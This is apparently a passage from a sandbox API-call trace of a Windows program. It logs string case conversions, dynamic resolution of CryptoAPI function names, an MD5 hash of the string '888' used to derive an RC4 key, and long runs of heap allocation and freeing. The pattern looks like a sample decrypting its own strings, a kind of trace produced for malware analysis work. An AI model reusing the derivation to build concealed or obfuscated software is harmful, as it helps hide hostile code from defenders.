lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0224.304] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0224.304] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0224.304] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0224.304] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0224.304] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0224.304] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0224.304] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0224.304] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0224.304] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0224.304] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0224.304] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.305] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.305] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0224.305] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0224.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0224.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabb18, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0224.305] CryptCreateHash (in: hProv=0xa7c440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0224.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0224.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72738, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0224.305] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0224.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0224.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72648, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0224.305] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.305] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.305] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0224.305] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabd28, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0224.305] CryptHashData (hHash=0x9e1d38, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0224.305] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.305] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.306] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0224.306] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0224.306] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0224.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabd28, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0224.306] CryptDeriveKey (in: hProv=0xa7c440, Algid=0x6601, hBaseData=0x9e1d38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38658e0 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd28 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd10 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabd10 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba58 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba40 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba58 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0224.306] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba58 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabde8 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba70 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabe00 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabe30 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabda0 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabfb0 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabe78 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865b08 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba88 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0224.307] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb90 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbf0 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc20 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72528 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7b8 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab878 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8f0 [0224.308] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9f8 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab890 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab908 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab740 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7d0 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7b8 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab800 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab950 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab9b0 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab878 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab8d8 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab938 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaba28 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aabce0 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabaa0 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aabb78 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaba88 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabad0 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb90 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0224.309] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0224.309] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aabc20 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74820 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabab8 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0224.310] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbc0 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0224.310] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb00 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0224.310] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcf8 [0224.310] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x11) returned 0x29f6f00 [0224.311] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6f00, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0224.311] CryptDestroyHash (hHash=0x9e1d38) returned 1 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x38656b8 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb00 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc80 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0224.311] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0224.311] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38656b8 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab740 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0224.312] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb90 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba88 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc68 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc20 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0224.313] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0224.313] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbf0 [0224.314] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0224.314] HeapFree (in: hHeap=0x2af0000, 